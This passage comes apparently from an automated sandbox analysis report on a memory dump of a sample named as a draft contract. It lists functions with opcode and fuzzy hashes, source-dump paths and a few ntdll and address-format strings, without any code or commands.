                                                                                                                        • Instruction ID: f36c0fd6dd9cdb6503e58c11651ea6757317af21fb2b42147e68092d077f135d
                                                                                                                        • Opcode Fuzzy Hash: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
                                                                                                                        • Instruction Fuzzy Hash: 7BF0B4719967D5DFE733DB6CC444B21FBD49B01621F084DAAD74B875C2C7A4DA80C650
                                                                                                                        Function 017C0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
                                                                                                                        • Instruction ID: 5ccd9cd67484830c00e09b31cb87b58aedf807e95cd2f0600371397d1e3db2d7
                                                                                                                        • Opcode Fuzzy Hash: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
                                                                                                                        • Instruction Fuzzy Hash: 3FF0272E41A6808BCF329B2C68983DAEB55E781A24F09144DF4A057209C6748883C3A0
                                                                                                                        Function 0173C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c148b8376113eaaee8e0d3490ba46880e1137932cd379f37de2ef4e809b7f09
                                                                                                                        • Instruction ID: b46435dd72bf7a016a8b7172a4572b3d9618608dcc926e1451c0a746dcfa163d
                                                                                                                        • Opcode Fuzzy Hash: 5c148b8376113eaaee8e0d3490ba46880e1137932cd379f37de2ef4e809b7f09
                                                                                                                        • Instruction Fuzzy Hash: D4F0E271511691DFE3239B2CC948B11FBE89B857A1F089467D50697523C760E880DA51
                                                                                                                        Function 01742619 Relevance: .0, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                        • Instruction ID: 0e6076e6981fb16d23bad64a048914ba76001553a721abaed099aa690958608b
                                                                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                        • Instruction Fuzzy Hash: 81E0D8323006016BE7119E599CC4F47BB6EDFD6B10F050079B6045F256CAE2DC1986A4
                                                                                                                        Function 01796030 Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                        • Instruction ID: 21abb0275011dc807c9c6189ef12aa37eabace2ed3cc2651f38b763893dae151
                                                                                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                        • Instruction Fuzzy Hash: B1F01C721046049FE7218F0DE984F62FBB8EB45364F45C166E6099B661D379EC44CBA4
                                                                                                                        Function 01700710 Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                        • Instruction ID: fbff1d49b80a0f52ab5d7b6267f0d592d85c73777b170b3b40a6e253f4de0dac
                                                                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                        • Instruction Fuzzy Hash: 5DF0E539204741DBDB17CF19C040B95FBE4FB413A0B000094FC428B341DB75E982CB90
                                                                                                                        Function 017349D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                        • Instruction ID: 527e57a11d02900a5696d38ce279acb97cd39b140376003db12607fa52326762
                                                                                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                        • Instruction Fuzzy Hash: C1E0D832244145ABD3291A698808B66FBA5EBD57A0F150429E2028B156DB70DD42C7D9
                                                                                                                        Function 017D4164 Relevance: .0, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b25c487dc84ef23dcc951f210a18da3bcb155db987adc1ebcd073dc31c20fe08
                                                                                                                        • Instruction ID: 9159497725958f7a09d5e198e88793681d8297a144976561d5f92bc413351029
                                                                                                                        • Opcode Fuzzy Hash: b25c487dc84ef23dcc951f210a18da3bcb155db987adc1ebcd073dc31c20fe08
                                                                                                                        • Instruction Fuzzy Hash: 67F0E531A255954FE772D73CEA44B56F7F1AB10630F4E0564D4128BD16C330DC40C650
                                                                                                                        Function 017A678E Relevance: .0, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                        • Instruction ID: 132e08e4d955a0d987bda54132559c613b9a1b8bde6428744ecd29b17995becd
                                                                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                        • Instruction Fuzzy Hash: 1AE0DF32A00120BBDB2197998D09F9AFEACDBD4EA0F090054B601EB0E4E530DE00D6D0
                                                                                                                        Function 017D08C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                        • Instruction ID: be7b28d7586b3abbd8cd96d32608b0fa690ae90a7d5b443a5ee4f56c1f77fe41
                                                                                                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                        • Instruction Fuzzy Hash: B4E09B316803588FCB259A1DC141A53FFF8DFB5660F1590ADE90547612C231F842C6D0
                                                                                                                        Function 017025E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: de0c8b2b0ae981ee36c9d45fe8e9530eea66e4f75c12c47e1965a068d3c1bac3
                                                                                                                        • Instruction ID: 50a79989b928991ef7d63be24baba234eb71e5828f291519bbb911b3f707b912
                                                                                                                        • Opcode Fuzzy Hash: de0c8b2b0ae981ee36c9d45fe8e9530eea66e4f75c12c47e1965a068d3c1bac3
                                                                                                                        • Instruction Fuzzy Hash: 78E09232100A549BC322BF29DD09F8BB7DAEB60770F014529B115571D9CB30A810C788
                                                                                                                        Function 017BA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                        • Instruction ID: c64c0a1d0fae6a032f70fd0eaa66c2841e6d2f0a3ca7189eee43e2a31850fcfd
                                                                                                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                        • Instruction Fuzzy Hash: E2E06D31010A11DBE7326F2ED84CB92FAA0AF50711F148C29A096124B4C7B898C1CA40
                                                                                                                        Function 01784000 Relevance: .0, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                        • Instruction ID: e18edc8b234446c227e04b83218ce8e151f5e980391312d31003b3b2fa6f706f
                                                                                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                        • Instruction Fuzzy Hash: E0E0AE343403068BE715DF19C040B62BBB6BFD5A10F28C0A8A9498F205EB72A8438A40
                                                                                                                        Function 016F823B Relevance: .0, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                        • Instruction ID: e3299b9bdbebdc0e9b79036e25357e0f19eea28780ea496714054a5c150220f2
                                                                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                        • Instruction Fuzzy Hash: 04E0C235000A10EFDB322F19EC04F51B6A9FF94B60F21886DF182070AA97B0BC92CB84
                                                                                                                        Function 01702050 Relevance: .0, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1b343bcf0441eb30984663ab21ee73a4c7d8c8189f0ab86cabafd516dab1c160
                                                                                                                        • Instruction ID: 3dd7326e6234c66221aef1fa8af75f527ccbf7fb3fd4e0690a8749111991a836
                                                                                                                        • Opcode Fuzzy Hash: 1b343bcf0441eb30984663ab21ee73a4c7d8c8189f0ab86cabafd516dab1c160
                                                                                                                        • Instruction Fuzzy Hash: AFE08C32100550ABC312FA5DDD04E4AB3DAEBA4770F004125B151876D8CA20AC00C794
                                                                                                                        Function 01738A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                        • Instruction ID: 6de15bf254350d62268f98c1db1ca2eac1d4338bbfd8cc1a8f0a33750ab8cb3f
                                                                                                                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                        • Instruction Fuzzy Hash: E8E08633111A1487C729DE18D511B72B7A4EF85720F09473EA65387781C534E544C795
                                                                                                                        Function 01756AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                        • Instruction ID: f6d178ede72500df2b2fbd5e5264a5857509737fa83ea7246d50f8219a124e99
                                                                                                                        • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                        • Instruction Fuzzy Hash: 89D05E36511A50AFD3329F1BEA04C13FBF9FBC4E207050A2EB54583A24C670A806CBA0
                                                                                                                        Function 0173E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                        • Instruction ID: 256854034d77f7f447e8df7dbcc6ce996f51a0422f30aed00a8087a426298d9a
                                                                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                        • Instruction Fuzzy Hash: 4BD0A7321045105BD732AA1CFC04FC373D8BB48730F050459B014C7054C360AC41C644
                                                                                                                        Function 0177E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                        • Instruction ID: 94048e0b93da74e8e991617dd2967e0de8b545f4b7465df60e16a3bdcf9cb83c
                                                                                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                        • Instruction Fuzzy Hash: 7FE0EC369507849BDF12DF5DC644F5AFBF9BB94B40F150458A1085B6A4CA24A900CB40
                                                                                                                        Function 016FA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                        • Instruction ID: 02213c4e2692f08c3edcfd2b50bd2bf239b60add3a225d367cfcff4392748a3a
                                                                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                        • Instruction Fuzzy Hash: 00D0223221203093DB289A996C04F63B905EF80AA4F0A002C360E93904C1048C43C2E0
                                                                                                                        Function 0173A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                        • Instruction ID: 44300ac94241e301eb742e01b7cb94308cab649f64ef49fba913b480aee7793d
                                                                                                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                        • Instruction Fuzzy Hash: 10D012371D054DBBCB119F66DC01F957BA9E764BA0F444420B514875A0D63AE950D584
                                                                                                                        Function 0173CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 41c77e1f8aa1ca04c57b25831c7c794aac52b575c4a8a6655dbded060a702651
                                                                                                                        • Instruction ID: 6c3401eb6fb27d2dbdab912269dfdace2110b19d758ddf77deb6f2b198479195
                                                                                                                        • Opcode Fuzzy Hash: 41c77e1f8aa1ca04c57b25831c7c794aac52b575c4a8a6655dbded060a702651
                                                                                                                        • Instruction Fuzzy Hash: ECD0A930A05002CBDF2BEF08CA18E2EFBB0FB50A40F4004ACE700A2025E32ADD02CB00
                                                                                                                        Function 017102A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                        • Instruction ID: f1d9f624e9eccd81d59b4ba5380f81ec167dc1ebde7984bd516dc2da78895f2c
                                                                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                        • Instruction Fuzzy Hash: 65D0C935216E80CFD71BCB0CC5A4B55B3A8BB44F44F8144D0F802CBB26D62CD980CA00
                                                                                                                        Function 0173C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                        • Instruction ID: d5677f1eed71fd4a38bc23dfd53e70e83a5399b2a8535804730f348fa6c4e665
                                                                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                        • Instruction Fuzzy Hash: D3C01232290648AFC712AE99CD01F02BBA9EBA8B50F000421F2048B6B0D631E820EA84
                                                                                                                        Function 01720310 Relevance: .0, Instructions: 11COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                        • Instruction ID: 8d335537376763a19074f62af8a8663f3d36513744647193e8168ecec227fc30
                                                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                        • Instruction Fuzzy Hash: F4D01236100248EFCB01DF41C890D9AB72AFBD8710F108019FD19076118A31ED63DA90
                                                                                                                        Function 01700750 Relevance: .0, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                        • Instruction ID: 805a0907c37c8a13650b51a1cfbad4d0d16fb2ea3bbf77f7542ad6d795f24eec
                                                                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                        • Instruction Fuzzy Hash: F1C04879B01A428FCF16DB2ED298F49B7E4FB44750F150890E885CBB26EA64E941CA10
                                                                                                                        Function 01742890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 5846e797edf3d9f7c5de31bcb92a1d108c719179ee55fdf7db5168f398840b9d
                                                                                                                        • Instruction ID: 0c2a454417ee1ac51f2df1e593369d0d54dfbe269c1900e23498d9d73cd9ee61
                                                                                                                        • Opcode Fuzzy Hash: 5846e797edf3d9f7c5de31bcb92a1d108c719179ee55fdf7db5168f398840b9d
                                                                                                                        • Instruction Fuzzy Hash: D551F6B6A00116BFDF11DFACD88097EFBB8BB08240B148269F569D7646D374DE10CBA0
                                                                                                                        Function 017B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 2ddfc9abf36cc2ec0fe3b91222499790a5cb7f82cc2a9a710d96c7865bd34969
                                                                                                                        • Instruction ID: f7ee8878f97f8b71b31b7d9773a6a1f0130541d07ca89d734ae10c9bec2689fa
                                                                                                                        • Opcode Fuzzy Hash: 2ddfc9abf36cc2ec0fe3b91222499790a5cb7f82cc2a9a710d96c7865bd34969
                                                                                                                        • Instruction Fuzzy Hash: D251E471A00645AECB24DE5CCCD0ABFFBF9AF44200B148499E596D7646EBB8FE40C760
                                                                                                                        Function 01737630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ExecuteOptions, xrefs: 017746A0
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01774655
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01774725
                                                                                                                        • Execute=1, xrefs: 01774713
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01774742
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01774787
